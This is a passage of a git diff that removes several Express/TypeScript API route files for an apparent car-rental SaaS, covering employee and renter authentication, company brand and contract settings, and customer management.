trialEndAt.toISOString(), - nextStep: 'workspace_created', - emailDelivery, - }, - }) - } catch (err) { - next(err) - } -}) - -router.post('/complete-signup', (_req, res) => { - res.status(410).json({ - error: 'disabled', - message: 'Clerk-based signup has been removed. Use /auth/company/signup instead.', - statusCode: 410, - }) -}) - -router.post('/verify-email', (_req, res) => { - res.status(410).json({ - error: 'disabled', - message: 'Email verification resend via Clerk has been removed from this project.', - statusCode: 410, - }) -}) - -export default router diff --git a/apps/api/src/routes/auth.employee.ts b/apps/api/src/routes/auth.employee.ts deleted file mode 100644 index 9e10535..0000000 --- a/apps/api/src/routes/auth.employee.ts +++ /dev/null @@ -1,238 +0,0 @@ -import { Router } from 'express' -import { z } from 'zod' -import bcrypt from 'bcryptjs' -import jwt from 'jsonwebtoken' -import crypto from 'crypto' -import { prisma } from '../lib/prisma' -import { sendTransactionalEmail } from '../services/notificationService' -import { resetPasswordEmail, type Lang } from '../lib/emailTranslations' - -const router = Router() - -const RESET_TOKEN_TTL_MINUTES = 60 - -function ensureAppBasePath(baseUrl: string, basePath: string) { - try { - const url = new URL(baseUrl) - const normalizedPathname = url.pathname.replace(/\/$/, '') - if (normalizedPathname === basePath || normalizedPathname.endsWith(basePath)) { - return url.toString().replace(/\/$/, '') - } - - url.pathname = `${normalizedPathname}${basePath}` || basePath - return url.toString().replace(/\/$/, '') - } catch { - const trimmed = baseUrl.replace(/\/$/, '') - return trimmed.endsWith(basePath) ? trimmed : `${trimmed}${basePath}` - } -} - -function signEmployeeToken(employeeId: string) { - return jwt.sign( - { sub: employeeId, type: 'employee' }, - process.env.JWT_SECRET!, - { expiresIn: (process.env.JWT_EXPIRY ?? '8h') as jwt.SignOptions['expiresIn'] }, - ) -} - - -router.get('/me', async (req, res, next) => { - try { - const authHeader = req.headers.authorization - const token = authHeader?.startsWith('Bearer ') ? authHeader.slice(7) : null - - if (!token) { - return res.status(401).json({ - error: 'unauthenticated', - message: 'Authentication required', - statusCode: 401, - }) - } - - let employeeId = '' - try { - const payload = jwt.verify(token, process.env.JWT_SECRET!) as { sub: string; type: string } - if (payload.type !== 'employee') { - return res.status(401).json({ - error: 'invalid_token', - message: 'Invalid or expired session token', - statusCode: 401, - }) - } - employeeId = payload.sub - } catch { - return res.status(401).json({ - error: 'invalid_token', - message: 'Invalid or expired session token', - statusCode: 401, - }) - } - - const employee = await prisma.employee.findUnique({ - where: { id: employeeId }, - include: { company: true }, - }) - - if (!employee || !employee.isActive) { - return res.status(401).json({ - error: 'unauthenticated', - message: 'Employee account not found or inactive', - statusCode: 401, - }) - } - - res.json({ - data: { - employee: { - id: employee.id, - email: employee.email, - firstName: employee.firstName, - lastName: employee.lastName, - role: employee.role, - preferredLanguage: employee.preferredLanguage, - companyId: employee.companyId, - companyName: employee.company.name, - companySlug: employee.company.slug, - }, - }, - }) - } catch (err) { next(err) } -}) - -router.post('/login', async (req, res, next) => { - try { - const { email, password } = z.object({ - email: z.string().email().max(255).trim().toLowerCase(), - password: z.string().max(128), - }).parse(req.body) - - const employee = await prisma.employee.findFirst({ - where: { email }, - include: { company: true }, - }) - - if (!employee || !employee.isActive) { - return res.status(401).json({ error: 'invalid_credentials', message: 'Invalid email or password', statusCode: 401 }) - } - - if (!employee.passwordHash) { - return res.status(401).json({ error: 'password_not_set', message: 'This account does not have a password yet. Use the invitation or reset email to set one first.', statusCode: 401 }) - } - - const valid = await bcrypt.compare(password, employee.passwordHash) - if (!valid) { - return res.status(401).json({ error: 'invalid_credentials', message: 'Invalid email or password', statusCode: 401 }) - } - - const token = signEmployeeToken(employee.id) - - res.json({ - data: { - token, - employee: { - id: employee.id, - email: employee.email, - firstName: employee.firstName, - lastName: employee.lastName, - role: employee.role, - preferredLanguage: employee.preferredLanguage, - companyId: employee.companyId, - companyName: employee.company.name, - companySlug: employee.company.slug, - }, - }, - }) - } catch (err) { next(err) } -}) - -router.post('/forgot-password', async (req, res, next) => { - try { - const { email } = z.object({ email: z.string().email().max(255).trim().toLowerCase() }).parse(req.body) - - // Always return success to avoid user enumeration - const employee = await prisma.employee.findFirst({ where: { email, isActive: true } }) - if (employee) { - const rawToken = crypto.randomBytes(32).toString('hex') - const expiresAt = new Date(Date.now() + RESET_TOKEN_TTL_MINUTES * 60 * 1000) - - await prisma.employee.update({ - where: { id: employee.id }, - data: { passwordResetToken: rawToken, passwordResetExpiresAt: expiresAt }, - }) - - const dashboardUrl = ensureAppBasePath( - process.env.DASHBOARD_URL ?? process.env.NEXT_PUBLIC_DASHBOARD_URL ?? 'http://localhost:3001/dashboard', - '/dashboard', - ) - const resetUrl = `${dashboardUrl}/reset-password?token=${rawToken}` - - const lang = (employee.preferredLanguage as Lang) ?? 'fr' - await sendTransactionalEmail({ - to: email, - subject: resetPasswordEmail.subject(lang), - html: resetPasswordEmail.html(resetUrl, employee.firstName, RESET_TOKEN_TTL_MINUTES, lang), - text: resetPasswordEmail.text(resetUrl, employee.firstName, RESET_TOKEN_TTL_MINUTES, lang), - }).catch((err) => console.error('[ForgotPassword] Email send failed:', err?.message)) - } - - res.json({ data: { message: 'If that email is registered, a reset link has been sent.' } }) - } catch (err) { next(err) } -}) - -router.patch('/me/language', async (req, res, next) => { - try { - const authHeader = req.headers.authorization - const token = authHeader?.startsWith('Bearer ') ? authHeader.slice(7) : null - if (!token) return res.status(401).json({ error: 'unauthenticated', message: 'Authentication required', statusCode: 401 }) - - let employeeId = '' - try { - const payload = jwt.verify(token, process.env.JWT_SECRET!) as { sub: string; type: string } - if (payload.type !== 'employee') return res.status(401).json({ error: 'invalid_token', message: 'Invalid token', statusCode: 401 }) - employeeId = payload.sub - } catch { - return res.status(401).json({ error: 'invalid_token', message: 'Invalid or expired session token', statusCode: 401 }) - } - - const { language } = z.object({ language: z.enum(['en', 'fr', 'ar']) }).parse(req.body) - - await prisma.employee.update({ where: { id: employeeId }, data: { preferredLanguage: language } }) - - res.json({ data: { language } }) - } catch (err) { next(err) } -}) - -router.post('/reset-password', async (req, res, next) => { - try { - const { token, password } = z.object({ - token: z.string().min(1), - password: z.string().min(8).max(128), - }).parse(req.body) - - const employee = await prisma.employee.findFirst({ - where: { - passwordResetToken: token, - passwordResetExpiresAt: { gt: new Date() }, - }, - }) - - if (!employee) { - return res.status(400).json({ error: 'invalid_token', message: 'Reset link is invalid or has expired.', statusCode: 400 }) - } - - const passwordHash = await bcrypt.hash(password, 12) - - await prisma.employee.update({ - where: { id: employee.id }, - data: { - passwordHash, - passwordResetToken: null, - passwordResetExpiresAt: null, - }, - }) - - res.json({ data: { message: 'Password updated successfully. You can now sign in.' } }) - } catch (err) { next(err) } -}) - -export default router diff --git a/apps/api/src/routes/auth.renter.ts b/apps/api/src/routes/auth.renter.ts deleted file mode 100644 index 42433a5..0000000 --- a/apps/api/src/routes/auth.renter.ts +++ /dev/null @@ -1,98 +0,0 @@ -import { Router } from 'express' -import { z } from 'zod' -import { prisma } from '../lib/prisma' -import { requireRenterAuth } from '../middleware/requireRenterAuth' - -const router = Router() - -router.post('/signup', async (_req, res) => { - res.status(403).json({ - error: 'renter_signup_disabled', - message: 'Renter account creation is disabled. Only company owners can sign in to the platform.', - statusCode: 403, - }) -}) - -router.post('/login', async (_req, res) => { - res.status(403).json({ - error: 'renter_login_disabled', - message: 'Renter sign-in is disabled. Only company owners can sign in to the platform.', - statusCode: 403, - }) -}) - -router.get('/me', requireRenterAuth, async (req, res, next) => { - try { - const renter = await prisma.renter.findUniqueOrThrow({ - where: { id: req.renterId }, - select: { - id: true, - firstName: true, - lastName: true, - email: true, - phone: true, - preferredLocale: true, - preferredCurrency: true, - emailVerified: true, - savedCompanies: { - select: { - companyId: true, - }, - }, - }, - }) - - const savedCompanyIds = renter.savedCompanies.map((saved) => saved.companyId) - const companies = savedCompanyIds.length === 0 - ? [] - : await prisma.company.findMany({ - where: { id: { in: savedCompanyIds } }, - select: { - id: true, - brand: { - select: { - displayName: true, - subdomain: true, - logoUrl: true, - }, - }, - }, - }) - - const companyMap = new Map(companies.map((company) => [company.id, company])) - - const data = { - ...renter, - savedCompanies: renter.savedCompanies.map((saved) => ({ - id: saved.companyId, - brand: companyMap.get(saved.companyId)?.brand ?? null, - })), - } - res.json({ data }) - } catch (err) { next(err) } -}) - -router.patch('/me', requireRenterAuth, async (req, res, next) => { - try { - const body = z.object({ - firstName: z.string().min(1).max(100).trim().optional(), - lastName: z.string().min(1).max(100).trim().optional(), - phone: z.string().max(30).trim().optional(), - preferredLocale: z.enum(['en', 'fr', 'ar']).optional(), - preferredCurrency: z.enum(['MAD', 'USD', 'EUR']).optional(), - }).parse(req.body) - - const renter = await prisma.renter.update({ where: { id: req.renterId }, data: body }) - res.json({ data: renter }) - } catch (err) { next(err) } -}) - -router.post('/me/fcm-token', requireRenterAuth, async (req, res, next) => { - try { - const { fcmToken } = z.object({ fcmToken: z.string() }).parse(req.body) - await prisma.renter.update({ where: { id: req.renterId }, data: { fcmToken } }) - res.json({ data: { success: true } }) - } catch (err) { next(err) } -}) - -export default router diff --git a/apps/api/src/routes/companies.ts b/apps/api/src/routes/companies.ts deleted file mode 100644 index 9e9a013..0000000 --- a/apps/api/src/routes/companies.ts +++ /dev/null @@ -1,502 +0,0 @@ -import { Router } from 'express' -import { z } from 'zod' -import multer from 'multer' -import { prisma } from '../lib/prisma' -import { uploadImage } from '../lib/storage' -import { requireCompanyAuth } from '../middleware/requireCompanyAuth' -import { requireTenant } from '../middleware/requireTenant' -import { requireSubscription } from '../middleware/requireSubscription' -import { requireRole } from '../middleware/requireRole' - -const router = Router() -const upload = multer({ storage: multer.memoryStorage(), limits: { fileSize: 10 * 1024 * 1024 } }) -router.use(requireCompanyAuth, requireTenant, requireSubscription) - -const companySchema = z.object({ - name: z.string().min(1).optional(), - email: z.string().email().optional(), - phone: z.string().optional(), - address: z.record(z.unknown()).optional(), -}) - -const brandSchema = z.object({ - displayName: z.string().min(1).optional(), - tagline: z.string().optional(), - primaryColor: z.string().optional(), - accentColor: z.string().optional(), - publicEmail: z.string().email().optional(), - publicPhone: z.string().optional(), - publicAddress: z.string().optional(), - publicCity: z.string().optional(), - publicCountry: z.string().optional(), - websiteUrl: z.string().url().optional(), - whatsappNumber: z.string().optional(), - defaultLocale: z.string().optional(), - defaultCurrency: z.enum(['MAD', 'USD', 'EUR']).optional(), - amanpayMerchantId: z.string().optional(), - amanpaySecretKey: z.string().optional(), - paypalEmail: z.string().email().optional(), - paypalMerchantId: z.string().optional(), - isListedOnMarketplace: z.boolean().optional(), - homePageConfig: z.object({ - heroTitle: z.union([z.string(), z.null()]).optional(), - heroDescription: z.union([z.string(), z.null()]).optional(), - viewOffersLabel: z.union([z.string(), z.null()]).optional(), - viewPricingLabel: z.union([z.string(), z.null()]).optional(), - contactCompanyLabel: z.union([z.string(), z.null()]).optional(), - activeOffersTitle: z.union([z.string(), z.null()]).optional(), - seeAllOffersLabel: z.union([z.string(), z.null()]).optional(), - noActiveOffersLabel: z.union([z.string(), z.null()]).optional(), - publishedVehiclesTitle: z.union([z.string(), z.null()]).optional(), - viewVehicleLabel: z.union([z.string(), z.null()]).optional(), - pricingEyebrow: z.union([z.string(), z.null()]).optional(), - pricingTitle: z.union([z.string(), z.null()]).optional(), - pricingDescription: z.union([z.string(), z.null()]).optional(), - showOffers: z.boolean().optional(), - showVehicles: z.boolean().optional(), - showPricing: z.boolean().optional(), - layout: z.object({ - items: z.array(z.object({ - id: z.string().min(1), - type: z.enum(['hero', 'offers', 'vehicles', 'pricing']), - x: z.number().int().min(1), - y: z.number().int().min(1), - w: z.number().int().min(1), - h: z.number().int().min(1), - })), - }).optional(), - }).optional(), - menuConfig: z.object({ - aboutLabel: z.union([z.string(), z.null()]).optional(), - vehiclesLabel: z.union([z.string(), z.null()]).optional(), - offersLabel: z.union([z.string(), z.null()]).optional(), - pricingLabel: z.union([z.string(), z.null()]).optional(), - blogLabel: z.union([z.string(), z.null()]).optional(), - contactLabel: z.union([z.string(), z.null()]).optional(), - bookCarLabel: z.union([z.string(), z.null()]).optional(), - siteNavigationLabel: z.union([z.string(), z.null()]).optional(), - showAbout: z.boolean().optional(), - showVehicles: z.boolean().optional(), - showOffers: z.boolean().optional(), - showPricing: z.boolean().optional(), - showBlog: z.boolean().optional(), - showContact: z.boolean().optional(), - pageSections: z.object({ - home: z.object({ - hero: z.boolean().optional(), - offers: z.boolean().optional(), - vehicles: z.boolean().optional(), - pricing: z.boolean().optional(), - }).optional(), - about: z.object({ - hero: z.boolean().optional(), - highlights: z.boolean().optional(), - details: z.boolean().optional(), - }).optional(), - offers: z.object({ - header: z.boolean().optional(), - grid: z.boolean().optional(), - }).optional(), - pricing: z.object({ - hero: z.boolean().optional(), - plans: z.boolean().optional(), - payments: z.boolean().optional(), - faq: z.boolean().optional(), - }).optional(), - vehicles: z.object({ - header: z.boolean().optional(), - filters: z.boolean().optional(), - grid: z.boolean().optional(), - }).optional(), - vehicleDetail: z.object({ - gallery: z.boolean().optional(), - summary: z.boolean().optional(), - }).optional(), - blog: z.object({ - hero: z.boolean().optional(), - posts: z.boolean().optional(), - }).optional(), - contact: z.object({ - content: z.boolean().optional(), - }).optional(), - booking: z.object({ - content: z.boolean().optional(), - }).optional(), - bookingConfirmation: z.object({ - hero: z.boolean().optional(), - summary: z.boolean().optional(), - actions: z.boolean().optional(), - }).optional(), - }).optional(), - }).optional(), -}) - -const contractSettingsSchema = z.object({ - legalName: z.string().optional(), - registrationNumber: z.string().optional(), - taxId: z.string().optional(), - terms: z.string().optional(), - fuelPolicy: z.string().optional(), - depositPolicy: z.string().optional(), - lateFeePolicy: z.string().optional(), - damagePolicy: z.string().optional(), - contractFooterNote: z.string().optional(), - invoiceFooterNote: z.string().optional(), - signatureRequired: z.boolean().optional(), - showTax: z.boolean().optional(), - taxRate: z.number().optional(), - taxLabel: z.string().optional(), - fuelPolicyType: z.enum(['FULL_TO_FULL', 'FULL_TO_EMPTY', 'SAME_TO_SAME', 'PREPAID', 'FREE']).optional(), - fuelPolicyNote: z.string().optional(), - fuelChargePerLiter: z.number().int().optional(), - fuelShortfallFee: z.number().int().optional(), - lateFeePerHour: z.number().int().optional(), - additionalDriverCharge: z.enum(['FREE', 'PER_DAY', 'FLAT']).optional(), - additionalDriverDailyRate: z.number().int().optional(), - additionalDriverFlatRate: z.number().int().optional(), -}) - -const insurancePolicySchema = z.object({ - name: z.string().min(1), - description: z.string().optional(), - type: z.enum(['CDW', 'SCDW', 'THEFT', 'THIRD_PARTY', 'FULL', 'BASIC', 'ROADSIDE', 'PERSONAL', 'CUSTOM']), - chargeType: z.enum(['PER_DAY', 'PER_RENTAL', 'PERCENTAGE_OF_RENTAL']), - chargeValue: z.number().int().min(0), - isRequired: z.boolean().default(false), - isActive: z.boolean().default(true), - sortOrder: z.number().int().default(0), -}) - -const pricingRuleSchema = z.object({ - name: z.string().min(1), - type: z.enum(['SURCHARGE', 'DISCOUNT']), - condition: z.enum(['AGE_LESS_THAN', 'AGE_GREATER_THAN', 'LICENSE_YEARS_LESS_THAN', 'LICENSE_YEARS_GREATER_THAN']), - conditionValue: z.number().int(), - adjustmentType: z.enum(['PERCENTAGE', 'FLAT_PER_DAY', 'FLAT_TOTAL']), - adjustmentValue: z.number().int(), - isActive: z.boolean().default(true), - description: z.string().optional(), -}) - -const accountingSettingsSchema = z.object({ - reportingPeriod: z.enum(['WEEKLY', 'MONTHLY', 'QUARTERLY', 'ANNUAL']).optional(), - fiscalYearStart: z.number().int().min(1).max(12).optional(), - currency: z.enum(['MAD', 'USD', 'EUR']).optional(), - accountantEmail: z.string().email().optional(), - accountantName: z.string().optional(), - autoSendReport: z.boolean().optional(), - reportFormat: z.enum(['PDF', 'CSV', 'BOTH']).optional(), -}) - -function buildPaymentMethodsEnabled(input: { - amanpayMerchantId?: string | null - amanpaySecretKey?: string | null - paypalEmail?: string | null -}) { - const methods: Array<'AMANPAY' | 'PAYPAL'> = [] - if (input.amanpayMerchantId && input.amanpaySecretKey) methods.push('AMANPAY') - if (input.paypalEmail) methods.push('PAYPAL') - return methods -} - -router.get('/me', async (req, res, next) => { - try { - const company = await prisma.company.findUniqueOrThrow({ - where: { id: req.companyId }, - include: { - brand: true, - subscription: true, - _count: { select: { vehicles: true, customers: true, reservations: true } }, - }, - }) - res.json({ data: company }) - } catch (err) { next(err) } -}) - -router.patch('/me', requireRole('OWNER'), async (req, res, next) => { - try { - const body = companySchema.parse(req.body) - const company = await prisma.company.update({ - where: { id: req.companyId }, - data: body as any, - }) - res.json({ data: company }) - } catch (err) { next(err) } -}) - -router.get('/me/brand', async (req, res, next) => { - try { - const brand = await prisma.brandSettings.findUnique({ - where: { companyId: req.companyId }, - }) - res.json({ data: brand }) - } catch (err) { next(err) } -}) - -router.patch('/me/brand', requireRole('OWNER'), async (req, res, next) => { - try { - const body = brandSchema.parse(req.body) - const current = await prisma.brandSettings.findUnique({ where: { companyId: req.companyId } }) - const paymentMethodsEnabled = buildPaymentMethodsEnabled({ - amanpayMerchantId: body.amanpayMerchantId ?? current?.amanpayMerchantId, - amanpaySecretKey: body.amanpaySecretKey ?? current?.amanpaySecretKey, - paypalEmail: body.paypalEmail ?? current?.paypalEmail, - }) - const brand = await prisma.brandSettings.upsert({ - where: { companyId: req.companyId }, - update: { ...body, paymentMethodsEnabled }, - create: { - companyId: req.companyId, - displayName: body.displayName ?? req.company.name, - subdomain: req.company.slug, - paymentMethodsEnabled, - ...body, - }, - }) - res.json({ data: brand }) - } catch (err) { next(err) } -}) - -router.post('/me/brand/logo', requireRole('OWNER'), upload.single('file'), async (req, res, next) => { - try { - if (!req.file) { - return res.status(400).json({ error: 'missing_file', message: 'A logo file is required', statusCode: 400 }) - } - const url = await uploadImage(req.file.buffer, `companies/${req.companyId}/brand`, 'logo') - const brand = await prisma.brandSettings.upsert({ - where: { companyId: req.companyId }, - update: { logoUrl: url }, - create: { - companyId: req.companyId, - displayName: req.company.name, - subdomain: req.company.slug, - logoUrl: url, - }, - }) - res.json({ data: brand }) - } catch (err) { next(err) } -}) - -router.post('/me/brand/hero', requireRole('OWNER'), upload.single('file'), async (req, res, next) => { - try { - if (!req.file) { - return res.status(400).json({ error: 'missing_file', message: 'A hero image file is required', statusCode: 400 }) - } - const url = await uploadImage(req.file.buffer, `companies/${req.companyId}/brand`, 'hero') - const brand = await prisma.brandSettings.upsert({ - where: { companyId: req.companyId }, - update: { heroImageUrl: url }, - create: { - companyId: req.companyId, - displayName: req.company.name, - subdomain: req.company.slug, - heroImageUrl: url, - }, - }) - res.json({ data: brand }) - } catch (err) { next(err) } -}) - -router.post('/me/brand/subdomain/check', requireRole('OWNER'), async (req, res, next) => { - try { - const { subdomain } = z.object({ subdomain: z.string().min(3) }).parse(req.body) - const existing = await prisma.brandSettings.findFirst({ - where: { subdomain, companyId: { not: req.companyId } }, - }) - res.json({ data: { available: !existing } }) - } catch (err) { next(err) } -}) - -router.post('/me/brand/custom-domain', requireRole('OWNER'), async (req, res, next) => { - try { - const { customDomain } = z.object({ customDomain: z.string().min(3) }).parse(req.body) - const normalized = customDomain.toLowerCase().trim() - const existing = await prisma.brandSettings.findFirst({ - where: { customDomain: normalized, companyId: { not: req.companyId } }, - }) - if (existing) { - return res.status(409).json({ error: 'domain_taken', message: 'This custom domain is already in use', statusCode: 409 }) - } - const brand = await prisma.brandSettings.upsert({ - where: { companyId: req.companyId }, - update: { - customDomain: normalized, - customDomainVerified: false, - customDomainAddedAt: new Date(), - }, - create: { - companyId: req.companyId, - displayName: req.company.name, - subdomain: req.company.slug, - customDomain: normalized, - customDomainVerified: false, - customDomainAddedAt: new Date(), - }, - }) - res.json({ data: brand }) - } catch (err) { next(err) } -}) - -router.get('/me/brand/custom-domain/status', async (req, res, next) => { - try { - const brand = await prisma.brandSettings.findUnique({ where: { companyId: req.companyId } }) - const customDomain = brand?.customDomain ?? null - res.json({ - data: { - customDomain, - verified: brand?.customDomainVerified ?? false, - status: customDomain ? (brand?.customDomainVerified ? 'verified' : 'pending_dns') : 'not_configured', - dnsTarget: process.env.NEXT_PUBLIC_CUSTOM_DOMAIN_TARGET ?? 'cname.vercel-dns.com', - }, - }) - } catch (err) { next(err) } -}) - -router.delete('/me/brand/custom-domain', requireRole('OWNER'), async (req, res, next) => { - try { - const brand = await prisma.brandSettings.updateMany({ - where: { companyId: req.companyId }, - data: { customDomain: null, customDomainVerified: false, customDomainAddedAt: null }, - }) - res.json({ data: { success: brand.count > 0 } }) - } catch (err) { next(err) } -}) - -router.get('/me/contract-settings', async (req, res, next) => { - try { - const settings = await prisma.contractSettings.findUnique({ where: { companyId: req.companyId } }) - res.json({ data: settings }) - } catch (err) { next(err) } -}) - -router.patch('/me/contract-settings', requireRole('MANAGER'), async (req, res, next) => { - try { - const body = contractSettingsSchema.parse(req.body) - const settings = await prisma.contractSettings.upsert({ - where: { companyId: req.companyId }, - update: body, - create: { companyId: req.companyId, ...body }, - }) - res.json({ data: settings }) - } catch (err) { next(err) } -}) - -router.get('/me/insurance-policies', async (req, res, next) => { - try { - const policies = await prisma.insurancePolicy.findMany({ - where: { companyId: req.companyId }, - orderBy: [{ isRequired: 'desc' }, { sortOrder: 'asc' }, { name: 'asc' }], - }) - res.json({ data: policies }) - } catch (err) { next(err) } -}) - -router.post('/me/insurance-policies', requireRole('MANAGER'), async (req, res, next) => { - try { - const body = insurancePolicySchema.parse(req.body) - const policy = await prisma.insurancePolicy.create({ data: { companyId: req.companyId, ...body } }) - res.status(201).json({ data: policy }) - } catch (err) { next(err) } -}) - -router.patch('/me/insurance-policies/:id', requireRole('MANAGER'), async (req, res, next) => { - try { - const body = insurancePolicySchema.partial().parse(req.body) - const policy = await prisma.insurancePolicy.updateMany({ - where: { id: req.params.id, companyId: req.companyId }, - data: body, - }) - if (policy.count === 0) return res.status(404).json({ error: 'not_found', message: 'Insurance policy not found', statusCode: 404 }) - const updated = await prisma.insurancePolicy.findUniqueOrThrow({ where: { id: req.params.id } }) - res.json({ data: updated }) - } catch (err) { next(err) } -}) - -router.delete('/me/insurance-policies/:id', requireRole('MANAGER'), async (req, res, next) => { - try { - const deleted = await prisma.insurancePolicy.deleteMany({ where: { id: req.params.id, companyId: req.companyId } }) - if (deleted.count === 0) return res.status(404).json({ error: 'not_found', message: 'Insurance policy not found', statusCode: 404 }) - res.json({ data: { success: true } }) - } catch (err) { next(err) } -}) - -router.get('/me/pricing-rules', async (req, res, next) => { - try { - const rules = await prisma.pricingRule.findMany({ - where: { companyId: req.companyId }, - orderBy: [{ isActive: 'desc' }, { createdAt: 'asc' }], - }) - res.json({ data: rules }) - } catch (err) { next(err) } -}) - -router.post('/me/pricing-rules', requireRole('MANAGER'), async (req, res, next) => { - try { - const body = pricingRuleSchema.parse(req.body) - const rule = await prisma.pricingRule.create({ data: { companyId: req.companyId, ...body } }) - res.status(201).json({ data: rule }) - } catch (err) { next(err) } -}) - -router.patch('/me/pricing-rules/:id', requireRole('MANAGER'), async (req, res, next) => { - try { - const body = pricingRuleSchema.partial().parse(req.body) - const updated = await prisma.pricingRule.updateMany({ - where: { id: req.params.id, companyId: req.companyId }, - data: body, - }) - if (updated.count === 0) return res.status(404).json({ error: 'not_found', message: 'Pricing rule not found', statusCode: 404 }) - const rule = await prisma.pricingRule.findUniqueOrThrow({ where: { id: req.params.id } }) - res.json({ data: rule }) - } catch (err) { next(err) } -}) - -router.delete('/me/pricing-rules/:id', async (req, res, next) => { - try { - const deleted = await prisma.pricingRule.deleteMany({ where: { id: req.params.id, companyId: req.companyId } }) - if (deleted.count === 0) return res.status(404).json({ error: 'not_found', message: 'Pricing rule not found', statusCode: 404 }) - res.json({ data: { success: true } }) - } catch (err) { next(err) } -}) - -router.get('/me/accounting-settings', async (req, res, next) => { - try { - const settings = await prisma.accountingSettings.findUnique({ where: { companyId: req.companyId } }) - res.json({ data: settings }) - } catch (err) { next(err) } -}) - -router.patch('/me/accounting-settings', async (req, res, next) => { - try { - const body = accountingSettingsSchema.parse(req.body) - const settings = await prisma.accountingSettings.upsert({ - where: { companyId: req.companyId }, - update: body, - create: { companyId: req.companyId, ...body }, - }) - res.json({ data: settings }) - } catch (err) { next(err) } -}) - -router.get('/me/api-key', async (req, res, next) => { - try { - const company = await prisma.company.findUniqueOrThrow({ - where: { id: req.companyId }, - select: { apiKey: true }, - }) - res.json({ data: company }) - } catch (err) { next(err) } -}) - -router.post('/me/api-key/regenerate', async (req, res, next) => { - try { - const company = await prisma.company.update({ - where: { id: req.companyId }, - data: { apiKey: `api_${Math.random().toString(36).slice(2)}${Date.now()}` }, - select: { apiKey: true }, - }) - res.json({ data: company }) - } catch (err) { next(err) } -}) - -export default router diff --git a/apps/api/src/routes/customers.ts b/apps/api/src/routes/customers.ts deleted file mode 100644 index bf94210..0000000 --- a/apps/api/src/routes/customers.ts +++ /dev/null @@ -1,161 +0,0 @@ -import { Router } from 'express' -import { z } from 'zod' -import multer from 'multer' -import { prisma } from '../lib/prisma' -import { deleteImage, uploadImage } from '../lib/storage' -import { requireCompanyAuth } from '../middleware/requireCompanyAuth' -import { requireTenant } from '../middleware/requireTenant' -import { requireSubscription } from '../middleware/requireSubscription' -import { requireRole } from '../middleware/requireRole' -import { validateAndFlagLicense } from '../services/licenseValidationService' - -const router = Router() -const upload = multer({ storage: multer.memoryStorage(), limits: { fileSize: 10 * 1024 * 1024 } }) -router.use(requireCompanyAuth, requireTenant, requireSubscription) - -const paginationSchema = z.object({ - page: z.coerce.number().int().min(1).max(10000).default(1), - pageSize: z.coerce.number().int().min(1).max(100).default(20), -}) - -const customerSchema = z.object({ - firstName: z.string().min(1).max(100).trim(), - lastName: z.string().min(1).max(100).trim(), - email: z.string().email().max(255).trim().toLowerCase(), - phone: z.string().max(30).trim().optional(), - driverLicense: z.string().max(50).trim().optional(), - dateOfBirth: z.string().datetime().optional(), - nationality: z.string().max(100).trim().optional(), - address: z.record(z.unknown()).optional(), - notes: z.string().max(2000).trim().optional(), - licenseExpiry: z.string().datetime().optional(), - licenseIssuedAt: z.string().datetime().optional(), - licenseCountry: z.string().max(100).trim().optional(), - licenseNumber: z.string().max(50).trim().optional(), - licenseCategory: z.string().max(20).trim().optional(), -}) - -router.get('/', async (req, res, next) => { - try { - const { q, flagged } = req.query as Record - const { page, pageSize } = paginationSchema.parse(req.query) - const safeQ = q ? q.trim().slice(0, 100) : undefined - const where: any = { companyId: req.companyId } - if (flagged !== undefined) where.flagged = flagged === 'true' - if (safeQ) where.OR = [{ firstName: { contains: safeQ, mode: 'insensitive' } }, { lastName: { contains: safeQ, mode: 'insensitive' } }, { email: { contains: safeQ, mode: 'insensitive' } }] - - const [customers, total] = await Promise.all([ - prisma.customer.findMany({ where, skip: (page - 1) * pageSize, take: pageSize, orderBy: { createdAt: 'desc' } }), - prisma.customer.count({ where }), - ]) - res.json({ data: customers, total, page, pageSize, totalPages: Math.ceil(total / pageSize) }) - } catch (err) { next(err) } -}) - -router.post('/', async (req, res, next) => { - try { - const body = customerSchema.parse(req.body) - const customer = await prisma.customer.create({ - data: { - ...body, - companyId: req.companyId, - dateOfBirth: body.dateOfBirth ? new Date(body.dateOfBirth) : null, - licenseExpiry: body.licenseExpiry ? new Date(body.licenseExpiry) : null, - licenseIssuedAt: body.licenseIssuedAt ? new Date(body.licenseIssuedAt) : null, - } as any, - }) - if (body.licenseExpiry) { - await validateAndFlagLicense(customer.id).catch(() => null) - } - res.status(201).json({ data: customer }) - } catch (err) { next(err) } -}) - -router.get('/:id', async (req, res, next) => { - try { - const customer = await prisma.customer.findFirstOrThrow({ - where: { id: req.params.id, companyId: req.companyId }, - include: { reservations: { include: { vehicle: true }, orderBy: { createdAt: 'desc' }, take: 20 } }, - }) - res.json({ data: customer }) - } catch (err) { next(err) } -}) - -router.patch('/:id', requireRole('MANAGER'), async (req, res, next) => { - try { - const { id } = z.object({ id: z.string() }).parse(req.params) - const body = customerSchema.partial().parse(req.body) - const updated = await prisma.customer.updateMany({ where: { id, companyId: req.companyId }, data: { ...body, dateOfBirth: body.dateOfBirth ? new Date(body.dateOfBirth) : undefined, licenseExpiry: body.licenseExpiry ? new Date(body.licenseExpiry) : undefined, licenseIssuedAt: body.licenseIssuedAt ? new Date(body.licenseIssuedAt) : undefined } as any }) - if (updated.count === 0) return res.status(404).json({ error: 'not_found', message: 'Customer not found', statusCode: 404 }) - if (body.licenseExpiry) await validateAndFlagLicense(id).catch(() => null) - const customer = await prisma.customer.findUniqueOrThrow({ where: { id } }) - res.json({ data: customer }) - } catch (err) { next(err) } -}) - -router.post('/:id/flag', requireRole('MANAGER'), async (req, res, next) => { - try { - const { reason } = z.object({ reason: z.string().optional() }).parse(req.body) - await prisma.customer.updateMany({ where: { id: req.params.id, companyId: req.companyId }, data: { flagged: true, flagReason: reason ?? null } }) - res.json({ data: { success: true } }) - } catch (err) { next(err) } -}) - -router.delete('/:id/flag', requireRole('MANAGER'), async (req, res, next) => { - try { - await prisma.customer.updateMany({ where: { id: req.params.id, companyId: req.companyId }, data: { flagged: false, flagReason: null } }) - res.json({ data: { success: true } }) - } catch (err) { next(err) } -}) - -router.post('/:id/validate-license', async (req, res, next) => { - try { - const customer = await prisma.customer.findFirstOrThrow({ where: { id: req.params.id, companyId: req.companyId } }) - const result = await validateAndFlagLicense(customer.id) - res.json({ data: result }) - } catch (err) { next(err) } -}) - -router.post('/:id/license-image', upload.single('file'), async (req, res, next) => { - try { - if (!req.file) { - return res.status(400).json({ error: 'missing_file', message: 'A license image file is required', statusCode: 400 }) - } - if (!req.file.mimetype.startsWith('image/')) { - return res.status(400).json({ error: 'invalid_file_type', message: 'Only image uploads are supported', statusCode: 400 }) - } - - const customer = await prisma.customer.findFirstOrThrow({ where: { id: 